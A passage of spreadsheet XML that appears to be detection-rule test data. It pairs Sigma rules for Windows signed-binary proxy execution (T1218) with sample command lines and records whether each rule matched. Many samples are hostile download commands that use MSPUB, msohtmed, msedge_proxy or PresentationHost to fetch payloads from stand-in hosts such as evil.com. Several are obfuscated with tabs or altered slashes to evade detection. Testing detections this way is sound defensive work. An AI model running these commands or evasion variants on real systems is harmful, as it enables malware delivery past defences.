      <c r="A3715" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3715" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3715" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3715" s="44" t="inlineStr">
        <is>
          <t>unregmp2.exe /HideWMP:extra</t>
        </is>
      </c>
      <c r="F3715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3715" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3715" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J3715" s="44" t="n"/>
      <c r="K3715" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3716" ht="15.75" customHeight="1" s="42">
      <c r="A3716" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3716" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3716" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3716" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3716" s="44" t="inlineStr">
        <is>
          <t>unregmp2.exe    /HideWMP</t>
        </is>
      </c>
      <c r="F3716" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3716" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3716" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J3716" s="44" t="n"/>
      <c r="K3716" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3717" ht="15.75" customHeight="1" s="42">
      <c r="A3717" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3717" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_unregmp2</t>
        </is>
      </c>
      <c r="C3717" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy</t>
        </is>
      </c>
      <c r="D3717" s="44" t="inlineStr">
        <is>
          <t>727454c0-d851-48b0-8b89-385611ab0704</t>
        </is>
      </c>
      <c r="E3717" s="44" t="inlineStr">
        <is>
          <t>unregmp2.exe /HideWmp</t>
        </is>
      </c>
      <c r="F3717" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3717" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3717" s="44" t="inlineStr">
        <is>
          <t>Lolbin Unregmp2.exe Use As Proxy (727454c0-d851-48b0-8b89-385611ab0704)</t>
        </is>
      </c>
      <c r="J3717" s="44" t="n"/>
      <c r="K3717" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3718" ht="15.75" customHeight="1" s="42">
      <c r="A3718" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3718" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C3718" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D3718" s="44" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E3718" s="44" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" C:\Users\Public\\evil.mof</t>
        </is>
      </c>
      <c r="F3718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3718" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3718" s="44" t="n"/>
      <c r="J3718" s="44" t="n"/>
      <c r="K3718" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3719" ht="15.75" customHeight="1" s="42">
      <c r="A3719" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3719" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C3719" s="44" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D3719" s="44" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E3719" s="44" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" "C:\Users\Public\evil.mof"</t>
        </is>
      </c>
      <c r="F3719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3719" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3719" s="44" t="n"/>
      <c r="J3719" s="44" t="n"/>
      <c r="K3719" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3720" ht="15.75" customHeight="1" s="42">
      <c r="A3720" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3720" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C3720" s="44" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D3720" s="44" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E3720" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe "-DownloadFile" "-url" https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F3720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3720" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3720" s="44" t="n"/>
      <c r="J3720" s="44" t="n"/>
      <c r="K3720" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3721" ht="15.75" customHeight="1" s="42">
      <c r="A3721" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3721" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C3721" s="44" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D3721" s="44" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E3721" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe /DownloadFile /url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F3721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3721" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3721" s="44" t="n"/>
      <c r="J3721" s="44" t="n"/>
      <c r="K3721" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3722" ht="15.75" customHeight="1" s="42">
      <c r="A3722" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3722" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mpcmdrun_download_arbitrary_file</t>
        </is>
      </c>
      <c r="C3722" s="44" t="inlineStr">
        <is>
          <t>File Download Via Windows Defender MpCmpRun.EXE</t>
        </is>
      </c>
      <c r="D3722" s="44" t="inlineStr">
        <is>
          <t>46123129-1024-423e-9fae-43af4a0fa9a5</t>
        </is>
      </c>
      <c r="E3722" s="44" t="inlineStr">
        <is>
          <t>MpCmdRun.exe -path C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -DownloadFile</t>
        </is>
      </c>
      <c r="F3722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3722" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3722" s="44" t="n"/>
      <c r="J3722" s="44" t="n"/>
      <c r="K3722" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3723" ht="15.75" customHeight="1" s="42">
      <c r="A3723" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3723" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C3723" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D3723" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E3723" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server "https://evil.com/payload.exe"</t>
        </is>
      </c>
      <c r="F3723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3723" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3723" s="44" t="n"/>
      <c r="J3723" s="44" t="n"/>
      <c r="K3723" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3724" ht="15.75" customHeight="1" s="42">
      <c r="A3724" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3724" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C3724" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D3724" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E3724" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server https:\\evil.com\payload.exe</t>
        </is>
      </c>
      <c r="F3724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3724" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3724" s="44" t="n"/>
      <c r="J3724" s="44" t="n"/>
      <c r="K3724" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3725" ht="15.75" customHeight="1" s="42">
      <c r="A3725" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3725" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C3725" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D3725" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E3725" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server h	t	t	p	s	:	/	/	evil.com/payload.exe</t>
        </is>
      </c>
      <c r="F3725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3725" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3725" s="44" t="n"/>
      <c r="J3725" s="44" t="n"/>
      <c r="K3725" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3726" ht="15.75" customHeight="1" s="42">
      <c r="A3726" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3726" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3726" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3726" s="44" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3726" s="44" t="inlineStr">
        <is>
          <t>msohtmed.exe HttPs://evil.com/payload.html</t>
        </is>
      </c>
      <c r="F3726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3726" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3726" s="44" t="n"/>
      <c r="J3726" s="44" t="n"/>
      <c r="K3726" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3727" ht="15.75" customHeight="1" s="42">
      <c r="A3727" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3727" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3727" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3727" s="44" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3727" s="44" t="inlineStr">
        <is>
          <t>msohtmed.exe https:\\evil.com\payload.html</t>
        </is>
      </c>
      <c r="F3727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3727" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3727" s="44" t="n"/>
      <c r="J3727" s="44" t="n"/>
      <c r="K3727" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3728" ht="15.75" customHeight="1" s="42">
      <c r="A3728" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3728" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3728" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3728" s="44" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3728" s="44" t="inlineStr">
        <is>
          <t>msohtmed.exe "https://evil.com/payload.html"</t>
        </is>
      </c>
      <c r="F3728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3728" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3728" s="44" t="n"/>
      <c r="J3728" s="44" t="n"/>
      <c r="K3728" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3729" ht="15.75" customHeight="1" s="42">
      <c r="A3729" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3729" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3729" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3729" s="44" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3729" s="44" t="inlineStr">
        <is>
          <t>msohtmed.exe	https://evil.com/payload.html</t>
        </is>
      </c>
      <c r="F3729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3729" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3729" s="44" t="n"/>
      <c r="J3729" s="44" t="n"/>
      <c r="K3729" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3730" ht="15.75" customHeight="1" s="42">
      <c r="A3730" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3730" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C3730" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D3730" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E3730" s="44" t="inlineStr">
        <is>
          <t>MSPUB.exe https:\\evil.com\payload.pub</t>
        </is>
      </c>
      <c r="F3730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3730" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3730" s="44" t="n"/>
      <c r="J3730" s="44" t="n"/>
      <c r="K3730" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3731" ht="15.75" customHeight="1" s="42">
      <c r="A3731" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3731" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C3731" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D3731" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E3731" s="44" t="inlineStr">
        <is>
          <t>MSPUB.exe "https://evil.com/payload.pub"</t>
        </is>
      </c>
      <c r="F3731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3731" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3731" s="44" t="n"/>
      <c r="J3731" s="44" t="n"/>
      <c r="K3731" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3732" ht="15.75" customHeight="1" s="42">
      <c r="A3732" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3732" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mspub_download</t>
        </is>
      </c>
      <c r="C3732" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSPUB.EXE</t>
        </is>
      </c>
      <c r="D3732" s="44" t="inlineStr">
        <is>
          <t>3b3c7f55-f771-4dd6-8a6e-08d057a17caf</t>
        </is>
      </c>
      <c r="E3732" s="44" t="inlineStr">
        <is>
          <t>MSPUB.exe	https://evil.com/payload.pub</t>
        </is>
      </c>
      <c r="F3732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3732" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3732" s="44" t="n"/>
      <c r="J3732" s="44" t="n"/>
      <c r="K3732" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3733" ht="15.75" customHeight="1" s="42">
      <c r="A3733" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3733" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C3733" s="44" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D3733" s="44" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E3733" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Invoke-ATHRemoteFXvGPUDisablementCommand -Module_Name foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F3733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3733" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3733" s="44" t="n"/>
      <c r="J3733" s="44" t="n"/>
      <c r="K3733" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3734" ht="15.75" customHeight="1" s="42">
      <c r="A3734" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3734" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C3734" s="44" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D3734" s="44" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E3734" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Invoke-ATHRemoteFXvGPUDisablementCommand -m foo -ModulePath $PWD}</t>
        </is>
      </c>
      <c r="F3734" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3734" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3734" s="44" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses (a6fc3c46-23b8-4996-9ea2-573f4c4d88c5)</t>
        </is>
      </c>
      <c r="J3734" s="44" t="n"/>
      <c r="K3734" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3735" ht="15.75" customHeight="1" s="42">
      <c r="A3735" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3735" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C3735" s="44" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D3735" s="44" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E3735" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath (Get-Location)}</t>
        </is>
      </c>
      <c r="F3735" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3735" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3735" s="44" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses (a6fc3c46-23b8-4996-9ea2-573f4c4d88c5)</t>
        </is>
      </c>
      <c r="J3735" s="44" t="n"/>
      <c r="K3735" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3736" ht="15.75" customHeight="1" s="42">
      <c r="A3736" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3736" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3736" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3736" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3736" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\PresentationHost.exe "https://example.com/malicious.xbap"</t>
        </is>
      </c>
      <c r="F3736" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3736" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3736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3736" s="44" t="n"/>
      <c r="K3736" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3737" ht="15.75" customHeight="1" s="42">
      <c r="A3737" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3737" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3737" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3737" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3737" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe -http https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F3737" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3737" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3737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3737" s="44" t="n"/>
      <c r="K3737" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3738" ht="15.75" customHeight="1" s="42">
      <c r="A3738" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3738" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3738" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3738" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3738" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F3738" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3738" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3738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3738" s="44" t="n"/>
      <c r="K3738" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3739" ht="15.75" customHeight="1" s="42">
      <c r="A3739" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3739" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3739" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3739" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3739" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\PresentationHost.exe https://example.com/malicious.xbap</t>
        </is>
      </c>
      <c r="F3739" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3739" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3739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3739" s="44" t="n"/>
      <c r="K3739" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3740" ht="15.75" customHeight="1" s="42">
      <c r="A3740" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3740" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C3740" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3740" s="44" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E3740" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe $("https://example.com/malicious.xbap")</t>
        </is>
      </c>
      <c r="F3740" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3740" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3740" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE (b124ddf4-778d-418e-907f-6dd3fc0d31cd); XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J3740" s="44" t="n"/>
      <c r="K3740" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3741" ht="15.75" customHeight="1" s="42">
      <c r="A3741" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3741" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
      <c r="C3741" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D3741" s="44" t="inlineStr">
        <is>
          <t>d22e2925-cfd8-463f-96f6-89cec9d9bc5f</t>
        </is>
      </c>
      <c r="E3741" s="44" t="inlineStr">
        <is>
          <t>PresentationHost.exe -- .xbap</t>
        </is>
      </c>
      <c r="F3741" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3741" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3741" s="44" t="inlineStr">
        <is>
          <t>XBAP Execution From Uncommon Locations Via PresentationHost.EXE (d22e2925-cfd8-463f-96f6-89cec9d9bc5f)</t>
        </is>
      </c>
      <c r="J3741" s="44" t="n"/>
      <c r="K3741" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3742" ht="15.75" customHeight="1" s="42">
      <c r="A3742" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3742" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_uncommon_location_exec</t>
        </is>
      </c>
